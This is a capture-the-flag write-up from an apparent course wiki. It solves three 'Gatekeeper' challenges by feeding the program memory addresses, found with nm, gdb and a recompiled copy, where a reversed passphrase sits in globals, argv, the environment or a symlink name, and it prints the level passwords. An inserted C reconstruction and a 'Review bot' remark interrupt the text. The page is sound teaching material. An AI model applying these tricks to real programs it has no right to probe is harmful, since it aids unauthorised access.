Gatekeeper

This set of tasks requires you to enter a password in order to print the flag for the next level, but there's a catch: you don't type the password itself, you type a memory address at which the program expects to find it.

Gatekeeper_01

We know that the contents at the given address are checked against secret_pass[], so we can make the program check secret_pass[] against itself. secret_pass[] is a global variable, so we can find its address using 'nm'.

gatekeeper_01@dmns-VirtualBox:~$ nm gatekeeper_01 | grep secret_pass
0804a008 D secret_pass
gatekeeper_01@dmns-VirtualBox:~$ ./gatekeeper_01
Welcome to <<Gate 1>> human, what is your name?
Robot
What is the passphrase Robot? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
0x0804a008
Checking contents of 0x804a008
Access granted! The password to gatekeeper_02 is:
657a609fb15bfb8aa11d4566143e11eb

Gatekeeper_02

This one is more problematic because you need to give it the address of a buffer where the password is stored in reverse order, so you can't use the previous trick. However, there is still something that we control: the name buffer. It's a global variable like before, so we can use 'nm' to find its address and enter the reversed password as our name.

gatekeeper_02@dmns-VirtualBox:~$ nm gatekeeper_02 | grep name
0804a024 B name
gatekeeper_02@dmns-VirtualBox:~$ python
>>> "ultra_secret_passw0rd"[::-1]
'dr0wssap_terces_artlu'
gatekeeper_02@dmns-VirtualBox:~$ ./gatekeeper_02
Welcome to <<Gate 2>> human, what is your name?
dr0wssap_terces_artlu
What is the passphrase dr0wssap_terces_artlu? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
But this time, the passphrase should be stored in reverse order at that address!
0x0804a024
Checking contents of 0x804a024
Access granted! The password to gatekeeper_03 is:
d7e3fb11c279ca1eb7df1039880f20f5
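The check that gates 1 and 2 perform, reduced to an added C example that is not the challenge's source: secret_pass[] and name[] are globals (so 'nm' reports fixed addresses for them) and the check trusts whatever address the user typed. The buffer size and the exact comparison logic are assumptions reconstructed from the transcripts above.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Assumed layout modelled on the transcripts: both buffers are globals,
 * so 'nm' reports their addresses and they never move between runs. */
char secret_pass[] = "ultra_secret_passw0rd";  /* gate-2 passphrase from the page */
char name[64];                                  /* filled from the "name" prompt */

/* Gate 1: does memory at 'addr' hold secret_pass verbatim? */
int gate1_check(uintptr_t addr)
{
    return strcmp((const char *)addr, secret_pass) == 0;
}

/* Gate 2: does memory at 'addr' hold secret_pass in reverse order? */
int gate2_check(uintptr_t addr)
{
    const char *at = (const char *)addr;
    size_t n = strlen(secret_pass);
    if (strlen(at) != n)
        return 0;
    for (size_t i = 0; i < n; i++)
        if (at[i] != secret_pass[n - 1 - i])
            return 0;
    return 1;
}

/* Write the reverse of 'src' into 'dst' (dst must hold strlen(src)+1 bytes). */
char *reverse_into(char *dst, const char *src)
{
    size_t n = strlen(src);
    for (size_t i = 0; i < n; i++)
        dst[i] = src[n - 1 - i];
    dst[n] = '\0';
    return dst;
}

int main(void)
{
    /* Gate 1: hand it the address of secret_pass itself, as the nm trick does. */
    printf("gate 1 at &secret_pass: %d\n", gate1_check((uintptr_t)secret_pass));
    /* Gate 2: the user-controlled name buffer holds the reversed passphrase. */
    reverse_into(name, secret_pass);
    printf("gate 2 at &name:        %d\n", gate2_check((uintptr_t)name));
    printf("gate 2 at &secret_pass: %d\n", gate2_check((uintptr_t)secret_pass));
    return 0;
}
```

The same reversed-contents check is what gate 3 applies to the argv and environment strings in the sections that follow.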

Gatekeeper_03

This was a bonus challenge with increased difficulty because there is seemingly no user input at all except for the address itself. The hint was: "what happens before main() is called?" and the answer is that even though main() is declared without argc, argv and envp parameters, these are still passed on the stack. This leads to three slightly different solutions (argv[1], an environment variable, and argv[0]), and the addresses can be found either with gdb or with a local recompilation. Recompilation method: although you can't modify the original binary, you can compile a copy of the source for yourself with extra printf() calls:

+ int main(int argc, char **argv)
{
        char addr_buf[11];
        unsigned long addr = 0;
 
        char *addr_ptr = NULL;
        int i, len = strlen(secret_pass);
+       printf("Address of argv[0] is %p\n", argv[0]);
+       printf("Address of argv[1] is %p\n", argv[1]);
+       printf("Address of PASS env var is %p\n", getenv("PASS"));
        printf("Welcome to " TERM_GREEN "<<Gate 3>>" TERM_RESET " human, I know your name from last time\n");
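Review bot: the three added printf() calls pass char * values to %p, which is defined only for void *; cast them, e.g. `printf("Address of argv[0] is %p\n", (void *)argv[0]);`, and make sure <stdlib.h> is included for getenv(), which the excerpt does not show.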
gatekeeper_03@dmns-VirtualBox:~$ gcc -Wall gatekeeper_03_mod.c -o my_gatekeeper_03 -m32
gatekeeper_03@dmns-VirtualBox:~$ ./my_gatekeeper_03 
Address of argv[0] is 0xffffd872
Address of argv[1] is (nil)
Address of PASS env var is (nil)
Welcome to <<Gate 3>> human, I know your name from last time

Ok, so let's solve it using argv[1]:

gatekeeper_03@dmns-VirtualBox:~$ ./my_gatekeeper_03 dr0wssap_terces_agem
Address of argv[0] is 0xffffd85d
Address of argv[1] is 0xffffd870
Address of PASS env var is (nil)
gatekeeper_03@dmns-VirtualBox:~$ ./gatekeeper_03 dr0wssap_terces_agem
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd870
Checking contents of 0xffffd870
Wrong!The content there is [er_03]
#Note that there is a minor address difference because of using another binary
gatekeeper_03@dmns-VirtualBox:~$ ./gatekeeper_03 dr0wssap_terces_agem
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd876
Checking contents of 0xffffd876
Access granted! The final password is:
1baaf32f105ba8765de805abe47df0dd

Now, let's use an environment variable:

gatekeeper_03@dmns-VirtualBox:~$ PASS=dr0wssap_terces_agem ./my_gatekeeper_03 
Address of argv[0] is 0xffffd858
Address of argv[1] is (nil)
Address of PASS env var is 0xffffd870
Welcome to <<Gate 3>> human, I know your name from last time
gatekeeper_03@dmns-VirtualBox:~$ PASS=dr0wssap_terces_agem ./gatekeeper_03 
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd870
Checking contents of 0xffffd870
Wrong!The content there is []
#Oops, the misalignment landed right into a string terminator, let's check from the next byte
gatekeeper_03@dmns-VirtualBox:~$ PASS=dr0wssap_terces_agem ./gatekeeper_03 
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd871
Checking contents of 0xffffd871
Wrong!The content there is [PASS=dr0wssap_terces_agem]
gatekeeper_03@dmns-VirtualBox:~$ PASS=dr0wssap_terces_agem ./gatekeeper_03 
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd876
Checking contents of 0xffffd876
Access granted! The final password is:
1baaf32f105ba8765de805abe47df0dd

The last solution involves changing argv[0] itself, by running the binary through a symlink named after the reversed passphrase. This is my favorite solution:

gatekeeper_03@dmns-VirtualBox:~$ ln -s my_gatekeeper_03 dr0wssap_terces_agem
gatekeeper_03@dmns-VirtualBox:~$ ./dr0wssap_terces_agem 
Address of argv[0] is 0xffffd866
Address of argv[1] is (nil)
Address of PASS env var is (nil)
gatekeeper_03@dmns-VirtualBox:~$ rm dr0wssap_terces_agem 
gatekeeper_03@dmns-VirtualBox:~$ ln -s gatekeeper_03 dr0wssap_terces_agem
gatekeeper_03@dmns-VirtualBox:~$ ./dr0wssap_terces_agem 
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd866
Checking contents of 0xffffd866
Wrong!The content there is [./dr0wssap_terces_agem]
gatekeeper_03@dmns-VirtualBox:~$ ./dr0wssap_terces_agem 
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd868
Checking contents of 0xffffd868
Access granted! The final password is:
1baaf32f105ba8765de805abe47df0dd

Gdb method: basically the same approach, after finding the addresses in a controlled setup with gdb.

gatekeeper_03@dmns-VirtualBox:~$ gdb ./gatekeeper_03
Reading symbols from /home/gatekeeper_03/gatekeeper_03...done.
(gdb) break *main
Breakpoint 1 at 0x80485ec: file gatekeeper_03.c, line 19.
(gdb) run dr0wssap_terces_agem
Starting program: /home/gatekeeper_03/gatekeeper_03 dr0wssap_terces_agem
 
Breakpoint 1, main () at gatekeeper_03.c:19
19	{
#at the breakpoint on *main the return address is at $sp, so the arguments start at the next word => $sp + 4
(gdb) x /8wx $sp+4
0xffffd680:	0x00000002	0xffffd714	0xffffd720	0xf7fda858
0xffffd690:	0x00000000	0xffffd71c	0xffffd720	0xf7fb81c8
#0x00000002 is argc
#0xffffd714 is argv
#0xffffd720 is envp
(gdb) x /2s *0xffffd714
0xffffd840:	 "/home/gatekeeper_03/gatekeeper_03"
0xffffd862:	 "dr0wssap_terces_agem"
(gdb) x /2s *0xffffd720
0xffffd877:	 "SHELL=/bin/bash"
0xffffd887:	 "TERM=xterm"
(gdb) quit
#note that gdb starts the process using its absolute path, so use the same path outside gdb
gatekeeper_03@dmns-VirtualBox:~$ /home/gatekeeper_03/gatekeeper_03 dr0wssap_terces_agem
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd862 
Checking contents of 0xffffd862
Wrong!The content there is [agem]
gatekeeper_03@dmns-VirtualBox:~$ /home/gatekeeper_03/gatekeeper_03 dr0wssap_terces_agem
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd852
Checking contents of 0xffffd852
Access granted! The final password is:
1baaf32f105ba8765de805abe47df0dd
sesiuni/memory/ctf_sols/gatekeeper.txt · Last modified: 2013/07/19 04:24 by rcaragea